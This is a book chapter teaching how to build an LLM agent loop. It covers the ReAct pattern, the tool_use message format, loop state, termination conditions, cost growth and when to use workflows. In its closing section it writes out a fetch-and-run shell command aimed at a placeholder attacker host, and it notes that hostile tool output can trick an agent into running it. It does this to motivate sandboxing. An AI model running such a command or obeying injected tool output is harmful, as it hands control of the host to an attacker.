
Chapter 03a: The Agent Loop#

Prerequisites: Chapter 02 (Providers)

In this chapter

  • Why call_llm alone is not an agent, and how a short loop changes that
  • The ReAct pattern (reason, act, observe) as the shape of every production agent
  • The LoopState dataclass and the minimal loop body
  • Termination conditions, cost growth, and when to use a workflow instead


1. Motivation#

call_llm is a vending machine: one prompt in, one response out. Ask it "What is 37 times 48, plus half the current temperature in Paris?" and it stalls. The model does not know the current temperature. Arithmetic done in-context is unreliable. The right approach is three steps, each depending on the previous: call a calculator, fetch the weather, combine the two.

A single call_llm cannot do that. There is no memory of prior calls, no ability to execute Python.

The agent loop solves this: show the model a task, let it call tools, collect the results, feed everything back, repeat until done. The pattern is called ReAct (reason plus act): the model reasons about what to do, acts by calling a tool, observes the result, reasons again. Every production agent you have used (Claude.ai, Copilot, a support bot that "called a function") runs some version of this loop.

One sentence, then: LLM plus loop plus tools equals an agent. The LLM supplies reasoning, the loop supplies continuity, the tools supply capability. Take away any one and you are back to a vending machine. This is the smallest architecture that deserves the word "agent." Everything in the rest of the book (multi-agent orchestration, memory, routing, safety hooks) builds on this shape rather than replacing it.

This chapter covers the loop itself. Chapter 03b covers the tools: the registry the model reads, the sandbox that keeps tools from becoming weapons, and a build-along tutorial writing a real Model Context Protocol server.

By the end of this chapter your working definition of an agent will be roughly fourteen lines of Python. In 03b you will run a live tool call across an operating-system process boundary. Together those are the unit of understanding you need before memory (Chapter 04) or multi-agent patterns (Chapter 06) make sense.


2. The ReAct Loop#

ReAct (Yao et al., 2022) interleaves reasoning traces with action calls. The core shape:

Task -> Reason -> Act -> Observe -> Reason -> ... -> Answer

At each step the model sees the full conversation so far: every prior reason, every tool call, every result. The HTTP API is still stateless. Your loop maintains state by accumulating the conversation.

sequenceDiagram
    participant U as User
    participant L as Agent Loop
    participant M as LLM
    participant T as Tool Executor
    U->>L: task = "37*48 + half Paris temp"
    loop Until done or max_iterations
        L->>M: messages + tool_list
        alt tool_use in response
            M-->>L: tool_use(name="calculator", input={...})
            L->>T: calculator(expr="37*48")
            T-->>L: "1776"
            L->>L: append tool_result to messages
        else no tool_use
            M-->>L: text "The answer is 1787"
            L-->>U: final_answer
        end
    end

The tool_use block#

When you include tools in the request, the model can respond with a tool_use block instead of (or in addition to) text:

{
  "stop_reason": "tool_use",
  "content": [
    {"type": "text", "text": "I need 37 * 48 first."},
    {"type": "tool_use", "id": "toolu_01abc",
     "name": "calculator", "input": {"expr": "37 * 48"}}
  ]
}

stop_reason: "tool_use" means the model paused for results. Your loop executes the tool and sends the result back as a tool_result message, with tool_use_id matching the id from above. The model now knows 37 * 48 = 1776 and continues.

A single response can contain multiple tool_use blocks. The model may decide to fetch two URLs in parallel, or call the calculator twice with different expressions. Your loop should execute all tool calls in the response, collect all results into a single tool_result turn, and send them back together. Splitting them into separate API calls breaks the one-to-one mapping the API expects between assistant tool_use and user tool_result turns.
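A minimal sketch of that rule, assuming the registry is a plain dict mapping tool names to Python callables (execute_tool_calls is a hypothetical helper; the block shapes follow the API example above):

```python
def execute_tool_calls(response_content: list[dict], tools: dict) -> dict:
    """Run ALL tool_use blocks from one response and return ONE user turn."""
    results = []
    for block in response_content:
        if block["type"] != "tool_use":
            continue  # skip interleaved text blocks
        output = tools[block["name"]](**block["input"])
        results.append({
            "type": "tool_result",
            "tool_use_id": block["id"],  # must echo the model's id exactly
            "content": str(output),
        })
    # One user turn carrying every result, matching the assistant turn
    # one-to-one -- never one API call per tool result.
    return {"role": "user", "content": results}
```

However many tool_use blocks the response carries, the function produces exactly one user turn, which is what keeps the assistant/user pairing intact.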

LoopState#

A dataclass for what the loop has to remember between iterations:

from dataclasses import dataclass, field

@dataclass
class LoopState:
    messages: list[dict] = field(default_factory=list)
    iterations: int = 0
    tool_calls_made: int = 0
    final_answer: str | None = None

field(default_factory=list) matters. Write messages: list[dict] = [] and the dataclass machinery raises ValueError at class-definition time, precisely to block the classic Python trap: a bare mutable default is created once and shared by every instance.
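The trap the dataclass guards against is easiest to see with a plain default argument, where nothing stops you:

```python
def remember(item, history=[]):   # BUG: the [] is created once, at def time
    history.append(item)
    return history

a = remember("first")
b = remember("second")            # same list object as a
```

Both calls mutate the single list that was built when the function was defined, which is exactly what default_factory=list prevents for LoopState.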

The loop body#

async def run_loop(task, tools, *, model, max_iterations=10) -> LoopState:
    state = LoopState(messages=[{"role": "user", "content": task}])
    for i in range(max_iterations):
        state.iterations = i + 1
        response = await call_llm(state.messages, tools=tools, model=model)
        if response.stop_reason == "end_turn":
            state.final_answer = response.text
            return state
        # Append the assistant turn (text + tool_use blocks) and the
        # tool_result turn (user role, tool_use_id echoed back).
        state.messages.append(assistant_turn(response))
        state.messages.append(tool_result_turn(run_tools(response)))
        state.tool_calls_made += len(response.tool_calls)
    return state

[full: swarm/agents/worker.py]

Three points the code hides.

Why is messages a list? Every prior turn is sent on every subsequent call. The model in iteration 3 "remembers" iteration 1 because the list carries iteration 1 into the request. Clear the list between iterations and the agent forgets everything.

Why are tools passed on every call? The API does not cache them. The model sees the tool menu fresh each iteration.

Why are tool results sent as user messages? The Anthropic API requires it. Assistant calls tools, user returns results. The "user" role is your code, not a human. It is a protocol convention, not a semantic claim.
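Concretely, the two turns appended each iteration look like this (field names follow the Anthropic Messages API; the values are the calculator example from earlier):

```python
# One loop iteration appends exactly two turns. The assistant turn is the
# model's own content, echoed back verbatim; the user turn carries results.
assistant_turn = {
    "role": "assistant",
    "content": [
        {"type": "text", "text": "I need 37 * 48 first."},
        {"type": "tool_use", "id": "toolu_01abc",
         "name": "calculator", "input": {"expr": "37 * 48"}},
    ],
}
user_turn = {
    "role": "user",               # your code, not a human
    "content": [
        {"type": "tool_result", "tool_use_id": "toolu_01abc",
         "content": "1776"},      # id must match the tool_use above
    ],
}
messages = [{"role": "user", "content": "37*48 + half Paris temp"},
            assistant_turn, user_turn]
```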

Termination#

The loop ends on one of three signals:

  1. The model responds with no tool_use blocks (stop_reason == "end_turn").
  2. The model calls an explicit done tool with its final answer.
  3. The loop hits max_iterations.

The third signal is a circuit breaker, not overhead. Without it, ask an agent to find the largest prime and it will keep checking candidates forever. The guard turns an infinite loop into a bounded failure.

A subtler failure mode is when the agent correctly identifies the problem but the underlying service is broken: every tool call returns an error, the agent's reasoning step sees the error, slightly varies its approach, tries again, sees another error. The loop is working as designed. The system outside it is not. Add a tool-error counter to LoopState and break when it exceeds three consecutive errors. The iteration ceiling bounds the worst case; the error ceiling catches the common case faster.

A third failure mode is worth naming because it shows up often in support agents: the user keeps expressing dissatisfaction and the agent keeps apologizing and trying different tools. The fix is not to reduce max_iterations. The fix is to add an explicit rule to the system prompt: "If the user expresses dissatisfaction more than twice, create an escalation ticket and stop." An iteration ceiling bounds the cost; an escalation rule bounds the experience.

Cost growth is quadratic#

Each iteration re-sends everything from prior iterations. On a small model at $0.80 per million input tokens, a 3-iteration loop on a short context costs about $0.001; a 10-iteration loop, about $0.005 to $0.010 depending on tool output size. The pattern:

| Iteration | Input tokens | Why               |
|-----------|--------------|-------------------|
| 1         | ~100         | system + task     |
| 2         | ~200         | + iter1_result    |
| 3         | ~300         | + iter2_result    |
| N         | ~N * 100     | all prior context |

Total for N iterations is 1 + 2 + ... + N = N(N+1)/2. A 10-iteration loop costs roughly 55 times the first iteration, not 10. Chapter 07 covers compaction: periodically summarizing history to keep this bounded.
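The arithmetic is easy to check; a quick sketch, assuming each iteration adds roughly 100 tokens of new context and the $0.80-per-million input price from above:

```python
# Cumulative input tokens across N iterations: iteration i re-sends
# everything before it, so it costs ~i * tokens_per_turn on its own.
def total_input_tokens(n_iterations: int, tokens_per_turn: int = 100) -> int:
    return sum(i * tokens_per_turn for i in range(1, n_iterations + 1))

# 10 iterations re-send 55x the first iteration's tokens, not 10x.
cost = total_input_tokens(10) * 0.80 / 1_000_000   # ~ $0.0044 before tool output
```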

The same math explains why a verbose tool result costs far more than its own size suggests. Output 3 KB of JSON from a tool call and every subsequent iteration pays for those 3 KB again. Caps on tool output exist partly for safety and partly as cost control.

When to reach for a workflow instead#

If you can enumerate the steps in advance, use a deterministic workflow (prompt chaining), not an agent loop. Workflows are faster, cheaper, and easier to debug because each step is independently testable by mocking. Reach for the loop only when the model must decide what to do next based on intermediate results. Defaulting to an agent loop is an anti-pattern. If you find yourself adding special-case code for "when the model decides to do X," you have written a hidden workflow inside a loop. Extract the logic and make it explicit.

flowchart TD
    START([New task]) --> Q1{Can you enumerate<br/>the steps in advance?}
    Q1 -- Yes --> Q2{Is each step's input<br/>deterministic?}
    Q1 -- No --> AGENT[Agent loop<br/>ReAct / tool use]
    Q2 -- Yes --> WF[Workflow<br/>Prompt chaining]
    Q2 -- No --> Q3{Small number of<br/>fixed branches?}
    Q3 -- Yes --> ROUTER[Router +<br/>subworkflow per branch]
    Q3 -- No --> AGENT
    WF --> DONE([Build it])
    ROUTER --> DONE
    AGENT --> DONE

Concretely: classifying a support ticket and routing it to one of four queues is a workflow, not an agent loop. One LLM call, one switch statement. Resolving a billing dispute that may or may not need a credit, may or may not need an escalation, and may or may not require looking up prior tickets, is an agent loop. The decision tree is data-dependent. The cost of using a loop for the first case is five times the API spend for no gain. The cost of using a workflow for the second case is hard-coded branches that miss edge cases.
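The first case fits in a few lines; a sketch, with hypothetical queue names (the classification label would come from a single call_llm call, not a loop):

```python
# Workflow case: one LLM classification call produces a label, then a
# plain dispatch function -- the "switch statement" -- picks the queue.
QUEUES = {"billing", "technical", "account", "other"}

def dispatch(label: str) -> str:
    """Normalize the model's label; anything unrecognized goes to 'other'."""
    label = label.strip().lower()
    return label if label in QUEUES else "other"

# In use: label = (await call_llm([classify_prompt], model=model)).text
#         queue = dispatch(label)   # no tools, no loop, one call, one branch
```

Every step is testable without an API key: mock the label, assert the queue.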


3. What Goes Wrong, and Onward#

You have a loop that reasons. What you do not yet have is any safe way to execute the tools the loop wants to call. Right now your tools are raw Python functions. If one of them runs subprocess.run on an attacker-supplied string, you will execute arbitrary shell from a web page. The loop itself is not the problem; the tools are.

Two failure modes fall out of this directly:

  • Unconstrained tools execute dangerous code. An agent that can call run_bash("curl evil.site | sh") will, eventually, be tricked into doing so by hostile tool output. The loop has no idea the command is dangerous; it only sees JSON.
  • Per-call ergonomics. Without a registry, every new tool is another if-branch in your dispatcher. After ten tools, the code is unreadable.

Chapter 03b fixes both: a tool contract the model reads, a registry that dispatches safely, a sandbox that blocks the dangerous patterns, and a build-along MCP server that demonstrates cross-process tool execution in thirty lines. The loop you just built is the write mechanism. The next chapter is what the loop writes into.